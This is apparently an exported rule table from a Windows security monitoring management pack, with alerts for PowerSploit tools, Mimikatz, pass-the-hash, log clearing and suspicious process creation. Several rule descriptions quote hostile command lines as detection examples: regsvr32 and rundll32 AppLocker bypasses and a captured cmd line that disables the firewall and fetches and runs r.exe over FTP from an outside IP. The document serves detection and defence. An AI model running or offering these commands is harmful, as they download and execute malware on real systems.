| DisplayName | Description | ID | Target | Category | Enabled | Instance Name | Counter Name | Frequency | Event_ID | Event Source | Alert Generate | Alert Severity | Alert Priority | Remotable | Event Log |
| Security Monitoring: Collect SMBv1 Connections | Description for the new rule | Security.Monitoring.Collect.SMBv1Connections | Microsoft.Windows.Server.OperatingSystem | EventCollection | True | | | 0 | 0 | | False | | | True | |
| Security Monitoring: Collect LAPS Events | Description for the new event collection rule. | Security.Monitoring.CollectionRule.CollectLAPSEvents | Microsoft.Windows.Server.OperatingSystem | EventCollection | True | | | 0 | 0 | | False | | | True | |
| Security Monitoring: Possible Crypto-Ransomware Installed on Computer | This rule looks for common process creation events seen when certain types of malware are installed on a server. While it likely won't be useful for something that immediately acts, it could potentially detect versions configured to activate at a later time. | Security.Monitoring.Event.4688.GenericCryptoRansomWare | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 4688 | | True | Error | Normal | True | Security |
| Security Monitoring: RegSvr32 used to load a DLL that is not located on this machine | A little known RegSvr32 attack vector is the ability to load malicious DLL files for a location that the attacker controls. This can be over the internet or on an internal compromised host as RegSvr32 can take a URL with the correct sequence. This method of attack can bypass antivirus. A mitigation is in place using EMET, but if this tool is not in the environment, there is no way to detect it. Several known attack attack tools use this method. See https://attack.mitre.org/wiki/Technique/T1117#Examples for details. | Security.Monitoring.Event.RemoteRegSvr32 | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 4688 | | True | Error | Normal | True | Security |
| Security Monitoring: SeDebugPrivilege Escalation Detected | This alert is generated when a process other than WMI assigns itself debug privileges. | Security.Monitoring.Event.SeDebugPrivilegeEscalation | Microsoft.Windows.OperatingSystem | Alert | False | | | 0 | 0 | | True | Error | Normal | True | Security |
| Security Monitoring: Collect LANMAN Authentication | Collection rule to collect all authentication events using LanManager to authenticate. This is an old protocol that has known vulnerabilities and should be shut off. | Security.Monitoring.EventCollection.LanMan | Microsoft.Windows.Server.OperatingSystem | EventCollection | True | | | 0 | 0 | | False | | | True | |
| Security Monitoring: Collect NTLMV1 Events | Collection rule to collect all authentication events using NTLMv1 to authenticate. This is an old protocol that has known vulnerabilities and should be shut off. | Security.Monitoring.EventCollection.NTLMV1 | Microsoft.Windows.Server.OperatingSystem | EventCollection | True | | | 0 | 0 | | False | | | True | |
| Security Monitoring: Collect WDigest Authentication Events | If the proper audit policies are turned on, this rule will collect WDigest logons. See https://blogs.technet.microsoft.com/kfalde/2014/11/02/kb2871997-and-wdigest-part-2/ for details | Security.Monitoring.EventCollection.WdigestAuthentication | Microsoft.Windows.Server.DC.Computer | EventCollection | True | | | 0 | 0 | | False | | | True | |
| Security Monitoring Forwarded Events: Possible Crypto-Ransomware Installed on Computer | This rule looks for common process creation events seen when certain types of malware are installed on a server. While it likely won't be useful for something that immediately acts, it could potentially detect versions configured to activate at a later time. | Security.Monitoring.ForwardedEvents.4688.GenericCryptoRansomWare | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 4688 | | True | Error | Normal | True | ForwardedEvents |
| Security Monitoring Forwarded Events: Collect LAPS Events | Description for the new event collection rule. | Security.Monitoring.ForwardedEvents.CollectLAPSEvents | WindowsEventCollectorDiscovery.EventLogCollectorServer | EventCollection | True | | | 0 | 0 | | False | | | True | |
| Security Monitoring Forwarded Events: SeDebug Privilege Escalation Detected | This alert is generated when a process other than WMI assigns itself debug privileges. | Security.Monitoring.ForwardedEvents.DebugEscalation | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 0 | | True | Error | Normal | True | ForwardedEvents |
| Secuity Monitoring Forwarded Events: PowerSploit FindAV Signature Tool is in Use | Find-AVSignature is used to split a file into smaller chunks to detect which piece is being identified by AV. That part can be redesigned to avoid detection. | Security.Monitoring.ForwardedEvents.FindAVSignature | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 800 | | True | Error | Normal | True | ForwardedEvents |
| Security Monitoring ForwardedEvents: Powersploit Get DLL Load Path is in Use | Get-DLLLoad Path is used to find the name and location of a DLL that an application is using. The DLL can then be replaced with a malicious copy. | Security.Monitoring.ForwardedEvents.GetDLLLoadPath | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 800 | | True | Error | Normal | True | ForwardedEvents |
| Security Monitoring Forwarded Events: PowerSploit HTTP Path Discovery Tool is in Use | This tool is used to dictionary a web server to determine the status of a path. | Security.Monitoring.ForwardedEvents.GetHTTPStatus | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 800 | | True | Error | Normal | True | ForwardedEvents |
| Security Monitoring Forwarded Events: PowerSploit Key Stroke Logger in Use | This is a PowerSploit tool that can be used to log key strokes. | Security.Monitoring.ForwardedEvents.GetKeystroke | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 800 | | True | Error | Normal | True | ForwardedEvents |
| Security Monitoring Forwarded Events: PowerSploit Invoke DLL Injection Command in Use | A Powersploit tool used to inject code into DLL files is in use in the environment. | Security.Monitoring.ForwardedEvents.InvokeDLLInjection | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 800 | | True | Error | Normal | True | ForwardedEvents |
| Security Monitoring Forwarded Events: Invoke-Mimikatz Detected in Tier 0 Environment | Description for the new alert rule. | Security.Monitoring.ForwardedEvents.InvokeMimikatz | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 800 | | True | Error | Normal | True | ForwardedEvents |
| Security Monitoring Forwarded Events: Invoke Ninja Copy is in Use | This tool allows an attacker to make an offline copy of protected OS Secrets (i.e. the SAM) while they are in use. | Security.Monitoring.ForwardedEvents.InvokeNinjaCopy | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 800 | | True | Error | Normal | True | ForwardedEvents |
| Security Monitoring Forwarded Events: Invoke Portscan is in Use | This looks for the Powersploit tool Invoke-Portscan, which is used to can IP addresses for open ports. | Security.Monitoring.ForwardedEvents.InvokePortScan | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 800 | | True | Error | Normal | True | ForwardedEvents |
| Security Monitoring: Invoke ShellCode is in Use | Description for the new alert rule. | Security.Monitoring.ForwardedEvents.InvokeShellCodeInUse | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 800 | | True | Error | Normal | True | ForwardedEvents |
| Security Monitoring Forwarded Events: Hidden Process Starting Using PowerShell | Description for the new alert rule. | Security.Monitoring.ForwardedEvents.PowerShellStartHiddenProcess | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 800 | | True | Error | Normal | True | ForwardedEvents |
| Security Monitoring Forwarded Events: RegSvr32 used to load a DLL that is not located on this machine | A little known RegSvr32 attack vector is the ability to load malicious DLL files for a location that the attacker controls. This can be over the internet or on an internal compromised host as RegSvr32 can take a URL with the correct sequence. This method of attack can bypass antivirus. A mitigation is in place using EMET, but if this tool is not in the environment, there is no way to detect it. Several known attack attack tools use this method. See https://attack.mitre.org/wiki/Technique/T1117#Examples for details. | Security.Monitoring.ForwardedEvents.RemoteRegSvr32 | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 4688 | | True | Error | Normal | True | ForwardedEvents |
| Secuity Monitoring: PowerSploit FindAV Signature Tool is in Use | Find-AVSignature is used to split a file into smaller chunks to detect which piece is being identified by AV. That part can be redesigned to avoid detection. | Security.Monitoring.PowerShellLog.FindAVSignature | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 800 | | True | Error | Normal | True | Windows PowerShell |
| Security Monitoring: Powersploit Get DLL Load Path is in Use | Get-DLLLoad Path is used to find the name and location of a DLL that an application is using. The DLL can then be replaced with a malicious copy. | Security.Monitoring.PowerShellLog.GetDLLLoadPath | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 800 | | True | Error | Normal | True | Windows PowerShell |
| Security Monitoring: PowerSploit HTTP Path Discovery Tool is in Use | This tool is used to dictionary a web server to determine the status of a path. | Security.Monitoring.PowerShellLog.GetHTTPStatus | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 800 | | True | Error | Normal | True | Windows PowerShell |
| Security Monitoring: PowerSploit Key Stroke Logger in Use | This is a PowerSploit tool that can be used to log key strokes. | Security.Monitoring.PowerShellLog.GetKeystroke | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 800 | | True | Error | Normal | True | Windows PowerShell |
| Security Monitoring: PowerSploit Invoke DLL Injection Command in Use | A Powersploit tool used to inject code into DLL files is in use in the environment. | Security.Monitoring.PowerShellLog.InvokeDLLInjection | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 800 | | True | Error | Normal | True | Windows PowerShell |
| Security Monitoring: Invoke-Mimikatz is in Use. | Description for the new alert rule. | Security.Monitoring.PowerShellLog.InvokeMimikatzInUse | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 800 | | True | Error | Normal | True | Windows PowerShell |
| Security Monitoring: Invoke Ninja Copy is in Use | This tool allows an attacker to make an offline copy of protected OS Secrets (i.e. the SAM) while they are in use. | Security.Monitoring.PowerShellLog.InvokeNinjaCopy | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 800 | | True | Error | Normal | True | Windows PowerShell |
| Security Monitoring: Invoke Portscan is in Use | This looks for the Powersploit tool Invoke-Portscan, which is used to can IP addresses for open ports. | Security.Monitoring.PowerShellLog.InvokePortScan | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 800 | | True | Error | Normal | True | Windows PowerShell |
| Security Monitoring: Invoke ShellCode in Use | Description for the new alert rule. | Security.Monitoring.PowerShellLog.InvokeShellCodeInUse | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 800 | | True | Error | Normal | True | Windows PowerShell |
| Security Monitoring: Hidden Process Starting Using PowerShell | Description for the new alert rule. | Security.Monitoring.PowerShellLog.PowerShellStartHiddenProcess | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 800 | | True | Error | Normal | True | Windows PowerShell |
| Security Monitoring: Modification has been made to the DC OU | | Security.Monitoring.SecurityMonitoring.Event.DCOUModify | Microsoft.Windows.Server.DC.Computer | Alert | True | | | 0 | 0 | | True | Error | Normal | True | Security |
| Security Monitoring: A GPO was Created | A new GPO has been createed | Security.Monitoring.SecurityMonitoring.Event.GPOCreation | Microsoft.Windows.Server.DC.Computer | Alert | True | | | 0 | 0 | | True | Error | Normal | True | |
| Security Monitoring: A GPO was Deleted | This rule detects the deletion of a GPO | Security.Monitoring.SecurityMonitoring.Event.GPODeletionRule | Microsoft.Windows.Server.DC.Computer | Alert | True | | | 0 | 0 | | True | Error | Normal | True | |
| Security Monitoring: Failed RDP Logon | | SecurityMonitoring.Event.FailedLogin | Microsoft.Windows.Server.OperatingSystem | Custom | False | | | 0 | 0 | | True | Warning | Normal | True | |
| Collect Failed Login Attemts | Failed Login Attempts | SecurityMonitoring.Failed.Login.Attempts.Collection | Microsoft.Windows.Computer | EventCollection | True | | | 0 | 0 | | False | | | True | |
| Security Monitoring: Domain Admins membership has changed | | SecurityMonitoringMP.Accounts.DomainAdminChange | Microsoft.Windows.Server.DC.Computer | Alert | True | | | 0 | 0 | | True | Error | Normal | True | Security |
| Security Monitoring: Enterprise Admins membership has changed | | SecurityMonitoringMP.Accounts.EnterpriseAdminChange | Microsoft.Windows.Server.DC.Computer | Alert | True | | | 0 | 0 | | True | Error | Normal | True | Security |
| Security Monitoring: Local Administrators Group was Modified | | SecurityMonitoringMP.Accounts.LocalAdminChange | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 0 | | True | Error | Normal | True | Security |
| Security Monitoring: Schema Admins membership has changed | | SecurityMonitoringMP.Accounts.SchemaAdminChange | Microsoft.Windows.Server.DC.Computer | Alert | True | | | 0 | 0 | | True | Error | Normal | True | Security |
| Security Monitoring: Mimikatz in use | Mimikatz is a credential theft tool used for pass the hash attacks. This should not be present in your environment. | SecurityMonitoringMP.APPLocker.Mimikatz | Microsoft.Windows.Computer | Alert | False | | | 0 | 0 | | True | Error | Normal | True | Microsoft-Windows-AppLocker/EXE and DLL |
| Security Monitoring: Prohibited App in Use | | SecurityMonitoringMP.APPLocker.ProhibitedApp | Microsoft.Windows.Computer | Alert | True | | | 0 | 0 | | True | Error | Normal | True | Microsoft-Windows-AppLocker/EXE and DLL |
| Security Monitoring: PSEXEC in Use | | SecurityMonitoringMP.APPLocker.PSExec | Microsoft.Windows.Computer | Alert | False | | | 0 | 8003 | | True | Error | Normal | True | Microsoft-Windows-AppLocker/EXE and DLL |
| Security Monitoring: WCE in Use | WCE is a credential theft too used to perform pass the hash attacks and enumerate wdigest passwords if this is turned on in your environment. Other than penetration testing, there is little reason for this tool to exist in your environment. This should be investigated immediately. | SecurityMonitoringMP.APPLocker.WCE | Microsoft.Windows.Computer | Alert | False | | | 0 | 8003 | | True | Error | Normal | True | Microsoft-Windows-AppLocker/EXE and DLL |
| Security Monitoring: WinRar in use | | SecurityMonitoringMP.APPLocker.WinRar | Microsoft.Windows.Server.OperatingSystem | Alert | False | | | 0 | 8003 | | True | Error | Normal | True | Microsoft-Windows-AppLocker/EXE and DLL |
| Security Monitoring: A suspicious process creation (AppLocker bypass) was executed | To bypass restrictive Applocker policies, attackers will implement a specially crafted commandline which makes use of Windows native exe "Rundll32.exe" (required by Windows to load and run code in DLLs and therefore not blocked by Applocker). Rundll32.exe can be used to call javascript to execute arbitrary commands which are not blocked by restrictive Applocker policies. The rundll32.exe syntax is as follows:
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";<code>
Events of this nature need to be investigated | SecurityMonitoringMP.Event.4688.SuspiciousApplockerJava | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 4688 | | True | Error | Normal | True | Security |
| Security Monitoring: A suspicious process creation (AppLocker bypass using regsvr32) was execuited | AppLocker Bypass Techniques using Regsvr32.exe (greg)
Note: The following is already contained in SCUBA_RULE_Applocker_Bypass
Examples:
regsvr32 /s /n /u /i:file.sct scrobj.dll
regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll
regsvr32 /s /n /u /i:http://server/file.jpg scrobj.dll | SecurityMonitoringMP.Event.4688.SuspiciousApplockerRegsvr | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 4688 | | True | Error | Normal | True | Security |
| Security Monitoring: A suspicious process creation (cmd) was executed | These events should be investigated. We are tracking 4688 events with known strings often found in malicious scripts. While it is possible that there are normal conditions for this rule, any alert should be investigated immediately. | SecurityMonitoringMP.Event.4688.SuspiciousCMD | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 4688 | | True | Error | Normal | True | Security |
| Security Monitoring: A suspicious process creation (FTP script execution via echo command) was executed | Detection of FTP Scripts created via the Echo command:
Based on several cases where compromised SQLService was used and SQL Agent Jobs were created to invoke ‘xp_cmdshell’ which in turn created and launched FTP scripts to download and run malware…
Example of the commandline used to create and run ftp scripts:
"Command Line ": "\"\"\"C:\\Windows\\System32\\cmd.exe\"\" /c \"\"net1 stop sharedaccess&echo open 222.186.58.12 >> love.txt&echo 123>> love.txt&echo 123>> love.txt&echo binary >> love.txt&echo get r.exe >> love.txt&echo bye >> love.txt&ftp -s:love.txt&p -s:love.txt&r.exe&r.exe&del love.txt /q /f&exit\"\"\"
This type of event is rare and should be investigated | SecurityMonitoringMP.Event.4688.SuspiciousFTPCommand | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 4688 | | True | Error | Normal | True | Security |
| Security Monitoring: A suspicious process creation (registry) was executed | This rule inventories 4688 events and flags alerts for manually added registry keys. These are rare events and should be investigated when they appear. | SecurityMonitoringMP.Event.4688.SuspiciousReg | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 4688 | | True | Error | Normal | True | Security |
| Security Monitoring; A suspicious process creation (malicious use of WindowPosition with PowerShell) was executed | See: https://technet.microsoft.com/en-us/library/cc957410.aspx
The WindowPosition value specifies the position of the command window on the user's screen.
The value of this entry is an 8-byte hexadecimal value. The first four bytes (high word) represent the position of the window on the X (horizontal) axis. The last four bytes (low word) represent the position of the window on the Y (vertical) axis.
When the WindowPosition value is set to 201329664, (Hex: 0x0c00 0c00) this places the console in a non-visible section of the user’s screen (where X axis=0c00 and the Y axis=0c00) in an area that is hidden from view below the visible start menu/taskbar
Other console apps that can be modified to make the screen non-visible
| SecurityMonitoringMP.Event.4688.SuspiciousWindowsPosition | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 4688 | | True | Error | Normal | True | Security |
| Security Monitoring: Possible Golden Ticket in Use | | SecurityMonitoringMP.Event.GoldenTicketDetection | Microsoft.Windows.Server.DC.Computer | Alert | True | | | 0 | 4769 | | True | Error | Normal | True | Security |
| Security Monitoring: Local account created on a member server | In a normal environment, this will only happen when the system is setup. You should not see this event on production member servers at all | SecurityMonitoringMP.Event.LocalAccountCreatedonServer | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 0 | | True | Error | Normal | True | Security |
| Security Monitoring: Scheduled Task was Created | | SecurityMonitoringMP.Event.ScheduledTaskCreation | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 106 | | True | Error | Normal | True | Microsoft-Windows-TaskScheduler/Operational |
| Security Monitoring: Security Log was cleared | Clearing the security log is something an attacker will do to cover their tracks. By default, logs cycle. If the log has been cleared, this should be investigated. | SecurityMonitoringMP.Event.SecurityLogCleared | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 1102 | Microsoft-Windows-Eventlog | True | Error | Normal | True | Security |
| Security Monitoring: A Service was created on a domain controller | Monitors domain controller system logs for 7045 event ids (service created). Under normal state, this should never happen. | SecurityMonitoringMP.Event.ServiceCreatedonDC | Microsoft.Windows.Server.DC.Computer | Alert | True | | | 0 | 7045 | | True | Error | Normal | True | System |
| Security Monitoring: A service was created on a member server | I would consider enabling this rule for any production server that is in a steady state. No services should be created at this point, and any event where one is created would be worthy of investigation. | SecurityMonitoringMP.Event.ServiceCreatedonMemberServer | Microsoft.Windows.Server.OperatingSystem | Alert | False | | | 0 | 0 | | True | Error | Normal | True | System |
| Security Monitoring: Service associated with a known threat was created on a member server | This is a special case of event ID 7045 targeting the names of services that are created by known tools such as windows credential editor, psexec, etc. If you turned on the generic 7045 rule, this alert should be disabled as it will generate duplicate events. | SecurityMonitoringMP.Event.ServiceKnownThreat | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 7045 | | True | Error | Normal | True | System |
| Security Monitoring: A Smart Card has been Disabled to Allow for Interactive Logon | Someone has purposely desected the option to disable smart card authentication for the account. Verify that this has in fact been approved. | SecurityMonitoringMP.Event.SmartCardDisabled | Microsoft.Windows.Server.DC.Computer | Alert | True | | | 0 | 4738 | | True | Error | Normal | True | Security |
| Security Monitoring: Software was Installed on a Server | This rule look sfor 11707 events in the application log and alerts accordingly. Note that patches will likely be flagged with this rule, so it should be turned on if there is a good maintenance process in place | SecurityMonitoringMP.Event.SoftwareInstallOnServer | Microsoft.Windows.Server.OperatingSystem | Alert | False | | | 0 | 11707 | MsiInstaller | True | Warning | Normal | True | Application |
| Security Monitoring: Software was Removed from a Server | This may not be a security event and is disabled by default. This could be enabled and edited to target security software in customer environments. | SecurityMonitoringMP.Event.SoftwareRemovedFromServer | Microsoft.Windows.Server.OperatingSystem | Alert | False | | | 0 | 11724 | MsiInstaller | True | Warning | Normal | True | Application |
| Security Monitoring: The system Log was cleared | | SecurityMonitoringMP.Event.SystemLogCleared | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 104 | Microsoft-Windows-Eventlog | True | Error | Normal | True | System |
| Security Monitoring: A system has been powered off | This is not necessarily a security event, and as such it can generate noise and is off by default. | SecurityMonitoringMP.Event.SystemPoweredOff | Microsoft.Windows.Server.OperatingSystem | Alert | False | | | 0 | 1074 | User32 | True | Warning | Normal | True | System |
| Security Monitoring: A system was restarted | This is not necessarily a security event, and as such this is disabled by default, but it can be useful in tracking security events or bad business practice. | SecurityMonitoringMP.Event.SystemRestarted | Microsoft.Windows.Server.OperatingSystem | Alert | False | | | 0 | 1074 | User32 | True | Warning | Normal | True | System |
| Security Monitoring: Unexpected System Shutdown | This checks the system log for unexpected shutdown events and generates an alert. While not necessarily related to an attack, these events are potentially worth investigating for health reasons in the environment. | SecurityMonitoringMP.Event.UnexpectedShutdown | Microsoft.Windows.Server.OperatingSystem | Alert | False | | | 0 | 0 | | True | Warning | Normal | True | System |
| Security Monitoring Collection: Event ID 4672 | | SecurityMonitoringMP.EventCollection.4672 | Microsoft.Windows.Server.OperatingSystem | EventCollection | False | | | 0 | 0 | | False | | | True | |
| Security Monitoring Collection: Event ID 4624 Logon Type 4 | | SecurityMonitoringMP.EventCollection.BatchLogon | Microsoft.Windows.Server.OperatingSystem | EventCollection | True | | | 0 | 0 | | False | | | True | |
| Security Monitoring Event Collection: Event ID 4769 result 0x1F | | SecurityMonitoringMP.EventCollection.GoldenTicket | Microsoft.Windows.Server.DC.Computer | EventCollection | True | | | 0 | 0 | | False | | | True | |
| Security Monitoring Collection: Event ID 4694 | | SecurityMonitoringMP.EventCollection.SpecialGroupLogon | Microsoft.Windows.Server.OperatingSystem | EventCollection | True | | | 0 | 0 | | False | | | True | |
| Security Monitoring Forwarded Events: A suspicious process creation (AppLocker bypass) was executed | To bypass restrictive Applocker policies, attackers will implement a specially crafted commandline which makes use of Windows native exe "Rundll32.exe" (required by Windows to load and run code in DLLs and therefore not blocked by Applocker). Rundll32.exe can be used to call javascript to execute arbitrary commands which are not blocked by restrictive Applocker policies. The rundll32.exe syntax is as follows:
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";<code>
Events of this nature need to be investigated | SecurityMonitoringMP.ForwardedEvents.4688.SuspiciousApplockerJava | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 4688 | | True | Error | Normal | True | ForwardedEvents |
| Security Monitoring Forwarded Events: A suspicious process creation (AppLocker bypass using regsvr32) was execuited | AppLocker Bypass Techniques using Regsvr32.exe (greg)
Note: The following is already contained in SCUBA_RULE_Applocker_Bypass
Examples:
regsvr32 /s /n /u /i:file.sct scrobj.dll
regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll
regsvr32 /s /n /u /i:http://server/file.jpg scrobj.dll | SecurityMonitoringMP.ForwardedEvents.4688.SuspiciousApplockerRegsvr | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 4688 | | True | Error | Normal | True | ForwardedEvents |
| Security Monitoring Forwarded Events: A suspicious process creation (cmd) was executed | These events should be investigated. We are tracking 4688 events with known strings often found in malicious scripts. While it is possible that there are normal conditions for this rule, any alert should be investigated immediately. | SecurityMonitoringMP.ForwardedEvents.4688.SuspiciousCMD | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 4688 | | True | Error | Normal | True | ForwardedEvents |
| Security Monitoring Forwarded Events: A suspicious process creation (FTP script execution via echo command) was executed | Detection of FTP Scripts created via the Echo command:
Based on several cases where compromised SQLService was used and SQL Agent Jobs were created to invoke ‘xp_cmdshell’ which in turn created and launched FTP scripts to download and run malware…
Example of the commandline used to create and run ftp scripts:
"Command Line ": "\"\"\"C:\\Windows\\System32\\cmd.exe\"\" /c \"\"net1 stop sharedaccess&echo open 222.186.58.12 >> love.txt&echo 123>> love.txt&echo 123>> love.txt&echo binary >> love.txt&echo get r.exe >> love.txt&echo bye >> love.txt&ftp -s:love.txt&p -s:love.txt&r.exe&r.exe&del love.txt /q /f&exit\"\"\"
This type of event is rare and should be investigated | SecurityMonitoringMP.ForwardedEvents.4688.SuspiciousFTPCommand | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 4688 | | True | Error | Normal | True | ForwardedEvents |
| Security Monitoring Forwarded Events: A suspicious process creation (registry) was executed | This rule inventories 4688 events and flags alerts for manually added registry keys. These are rare events and should be investigated when they appear. | SecurityMonitoringMP.ForwardedEvents.4688.SuspiciousReg | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 4688 | | True | Error | Normal | True | ForwardedEvents |
| Security Monitoring Forwarded Events: A suspicious process creation (malicious use of WindowPosition with PowerShell) was executed | See: https://technet.microsoft.com/en-us/library/cc957410.aspx
The WindowPosition value specifies the position of the command window on the user's screen.
The value of this entry is an 8-byte hexadecimal value. The first four bytes (high word) represent the position of the window on the X (horizontal) axis. The last four bytes (low word) represent the position of the window on the Y (vertical) axis.
When the WindowPosition value is set to 201329664, (Hex: 0x0c00 0c00) this places the console in a non-visible section of the user’s screen (where X axis=0c00 and the Y axis=0c00) in an area that is hidden from view below the visible start menu/taskbar
Other console apps that can be modified to make the screen non-visible
| SecurityMonitoringMP.ForwardedEvents.4688.SuspiciousWindowsPosition | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 4688 | | True | Error | Normal | True | ForwardedEvents |
| Security Monitoring Forwarded Events: Potential Credential Swap in Progress | | SecurityMonitoringMP.ForwardedEvents.CredentialSwap | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 0 | | True | Error | Normal | True | ForwardedEvents |
| Security Monitoring Forwarded Events: Local User Created or Deleted in Administrator Security Group | | SecurityMonitoringMP.ForwardedEvents.LocalUserCreatedDeleted | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 0 | | True | Error | Normal | True | ForwardedEvents |
| Security Monitoring Forwarded Events: Prohibited App in Use | | SecurityMonitoringMP.ForwardedEvents.ProhibitedApp | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 8003 | | True | Error | Normal | True | ForwardedEvents |
| Security Monitoring Forwarded Events: Possible PtH Attack in Progress Against Tier 2 | | SecurityMonitoringMP.ForwardedEvents.PtHTier2 | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | False | | | 0 | 0 | | True | Error | Normal | True | ForwardedEvents |
| Security Monitoring Forwarded Events: Security log cleared on a server configured to forward events | | SecurityMonitoringMP.ForwardedEvents.SecurityLogCleared | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 1102 | Microsoft-Windows-Eventlog | True | Error | Normal | True | ForwardedEvents |
| Security Monitoring Forwarded Events: Service Created on system | | SecurityMonitoringMP.ForwardedEvents.ServiceCreation | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | False | | | 0 | 0 | | True | Error | Normal | True | ForwardedEvents |
| Security Monitoring Forwarded Events: Service associated with a known threat was created on a forwarding computer | | SecurityMonitoringMP.ForwardedEvents.ServiceCreationKnownThreats | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 7045 | | True | Error | Normal | True | ForwardedEvents |
| Security Monitoring Forwarded Events: Special Group logon event | | SecurityMonitoringMP.ForwardedEvents.SpecialGroupLogon | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 0 | | True | Error | Normal | True | ForwardedEvents |
| Security Monitoring Forwarded Events: System Log was Cleared | | SecurityMonitoringMP.ForwardedEvents.SystemLogCleared | WindowsEventCollectorDiscovery.EventLogCollectorServer | Alert | True | | | 0 | 104 | Microsoft-Windows-Eventlog | True | Error | Normal | True | ForwardedEvents |
| GPO Change Event then run correlation script Rule | | SecurityMonitoringMP.GPOMonitoring.EventAndScript.Rule | Microsoft.Windows.Server.DC.Computer | Custom | True | | | 0 | 0 | | True | Error | Normal | True | |
| Security Monitoring: Potential Credential Swap in Progress | | SecurityMonitoringMP.Pth.CredentialSwap | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 0 | | True | Error | Normal | True | Security |
| Security Monitoring: Possible PtH attack in progress (successful) against DC | | SecurityMonitoringMP.Pth.PtHAgainstDC | Microsoft.Windows.Server.DC.Computer | Alert | False | | | 0 | 0 | | True | Error | Normal | True | Security |
| Security Monitoring: Possible PtH Attack in Progress against tier 1 | | SecurityMonitoringMP.Pth.PtHAgainstTier1 | Microsoft.Windows.Server.OperatingSystem | Alert | False | | | 0 | 0 | | True | Error | Normal | True | Security |
| Security Monitoring Threat Hunting: Batch Logon in use | This rule checks the security log for event ID 4624 Logon Type 4. Logon type 4 is a batch logon, which essentially means that there are exposed credentials on this system. Investigation should determine which application is using said credentials. Once the applications are remediated, batch logons can be disabled, making your environment more secure. | SecurityMonitoringMP.ThreatHunt.BatchLogonInUse | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 0 | | True | Error | Normal | True | Security |
| Security Monitoring Threat Hunting: Special Group logon event | This rule will not generate any noise under normal environment. It requires special groups auditing turned on via GPO as well as the specific memberships to be targeted in the registry. If you've done these tasks, this monitor will alert every time a user that is a member of these | SecurityMonitoringMP.ThreatHunt.SpecialGroupLogon | Microsoft.Windows.Server.OperatingSystem | Alert | True | | | 0 | 0 | | True | Error | Normal | True | Security |